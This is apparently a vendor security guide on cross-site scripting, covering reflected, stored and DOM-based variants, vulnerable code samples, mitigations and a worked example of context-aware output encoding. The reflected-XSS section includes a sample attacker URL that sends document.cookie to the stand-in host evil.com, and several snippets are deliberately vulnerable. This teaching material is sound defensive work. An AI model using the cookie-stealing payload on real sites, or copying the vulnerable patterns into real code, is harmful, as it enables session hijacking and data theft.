Cross-Site Scripting (XSS)

Verified by Precogs Threat Research
Security Guide | A05:2025

What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a client-side code injection attack in which an attacker injects malicious script into web pages viewed by other users. The victim's browser executes the script because it appears to come from a trusted site, so it runs with that site's origin and session.

How Does XSS Work?

There are three types: Reflected XSS (malicious script is reflected from the server in the response), Stored XSS (the script is permanently stored on the target server), and DOM-based XSS (the vulnerability exists in client-side JavaScript). All exploit the browser's trust in the website's content.

Reflected XSS

The attacker crafts a URL containing a malicious script and tricks the victim into clicking it. The server reflects the script back in the HTTP response, and the victim's browser executes it.

<!-- Vulnerable search result page -->
<p>Search results for: <?= $_GET['query'] ?></p>

<!-- Attacker URL: /search?query=<script>document.location='https://evil.com/steal?c='+document.cookie</script> -->

Stored XSS

The malicious script is permanently stored on the target server (in a database, message forum, comment field). Every user who views the page executes the script.

// Vulnerable comment rendering (Express route; db is the application's data layer)
const express = require('express');
const app = express();

app.get('/comments', (req, res) => {
  const comments = db.getComments();
  // DANGEROUS: interpolating raw user-supplied HTML into the response
  res.send(comments.map(c => `<div>${c.body}</div>`).join(''));
});

DOM-Based XSS

The vulnerability exists entirely in client-side JavaScript. The malicious payload never touches the server.

// Vulnerable DOM manipulation
const hash = window.location.hash.substring(1);
document.getElementById('output').innerHTML = hash; // XSS via URL fragment

Real-World Examples

The 2018 British Airways breach used a Magecart XSS attack to steal 380,000 payment cards. The 2010 Twitter XSS worm spread to 500,000+ accounts in hours. Stored XSS in customer support portals regularly leads to admin account takeover.

Security Impact

XSS enables session hijacking, credential theft, keylogging, phishing, website defacement, and malware distribution. In single-page applications, XSS can compromise entire user sessions and access tokens.

Prevention & Mitigation

Apply output encoding that matches the context where data is inserted (HTML body, HTML attribute, JavaScript, URL, CSS). Deploy a Content Security Policy (CSP) header. Validate and sanitize input on the server side. Set the HttpOnly and Secure flags on cookies.
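The following is an added example, not Precogs' code or code from the original page: it implements the context-appropriate encoders named above and uses them to harden the comment-rendering route from the Stored XSS section. `SAMPLE_COMMENTS` is constructed data standing in for `db.getComments()`; the `author`, `website` and `body` fields and the `'#'` fallback for rejected links are assumptions of this example.

```javascript
// Added example, not Precogs' code: context-aware output encoders and a
// hardened rewrite of the comment-rendering route from the Stored XSS section.
// SAMPLE_COMMENTS is constructed data standing in for db.getComments().

// HTML body and attribute context: encode the five characters that can change
// the meaning of markup. Attribute values must also be double-quoted by the caller.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// JavaScript context: data embedded inside an inline <script> as a literal.
// JSON.stringify escapes quotes and backslashes; the extra replacements keep a
// value such as "</script>" from terminating the script element early.
function encodeJsValue(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// URL context for an href: encoding alone does not neutralise a "javascript:"
// link, so the scheme is checked against an allowlist first. Relative or
// unparseable values fall back to "#" (a design choice for this example).
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
function safeHref(value) {
  let url;
  try {
    url = new URL(String(value));
  } catch {
    return '#';
  }
  return SAFE_SCHEMES.has(url.protocol) ? url.href : '#';
}

// Query-string context: percent-encode a single parameter value.
function encodeQueryParam(value) {
  return encodeURIComponent(String(value));
}

// Hardened version of the vulnerable route body: every user-controlled field is
// encoded for the exact context it lands in (attribute, href, text node).
function renderComments(comments) {
  return comments
    .map(
      (c) =>
        `<div class="comment" data-author="${encodeHtml(c.author)}">` +
        `<a href="${encodeHtml(safeHref(c.website))}">${encodeHtml(c.author)}</a>` +
        `<p>${encodeHtml(c.body)}</p>` +
        `<a href="/comments?author=${encodeQueryParam(c.author)}">more</a>` +
        `</div>`
    )
    .join('');
}

// Server-side state handed to client code: JavaScript context, not HTML context.
function renderStateScript(comments) {
  return `<script>window.__COMMENTS__ = ${encodeJsValue(comments)};</script>`;
}

// Constructed rows: one benign, one carrying payloads for each context.
const SAMPLE_COMMENTS = [
  { author: 'alice', website: 'https://example.com/', body: 'Nice post!' },
  {
    author: 'mallory" onmouseover="alert(1)',
    website: 'javascript:alert(1)',
    body: '<script>alert(1)</script>',
  },
];

module.exports = { encodeHtml, encodeJsValue, safeHref, encodeQueryParam, renderComments, renderStateScript, SAMPLE_COMMENTS };
```

Calling `renderComments(SAMPLE_COMMENTS)` yields markup in which the second row's `<script>` arrives as `&lt;script&gt;`, the attribute-breaking quote in the author name is `&quot;`, and the `javascript:` link is replaced by `#`; `renderStateScript` emits the same data as a JS literal whose only `</script>` is the one closing the element. The point is that one encoder does not fit all contexts: `encodeHtml` alone would not have stopped the `javascript:` href, and HTML encoding inside a script block would corrupt the data rather than protect it.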

Secure Code Example

// SECURE: Using textContent instead of innerHTML
document.getElementById('output').textContent = userInput;

// SECURE: React auto-escapes by default
function Comment({ body }) {
  return <p>{body}</p>; // Safe — React escapes HTML entities
}

// SECURE: Content Security Policy header
// Content-Security-Policy: default-src 'self'; script-src 'self'

How Precogs AI Stops Cross-Site Scripting (XSS)

Precogs AI identifies XSS vulnerabilities in AI-generated frontend code through pre-LLM filters, detecting unsanitized output rendering and missing encoding in React, Vue, and Angular applications.

Related CWE Entries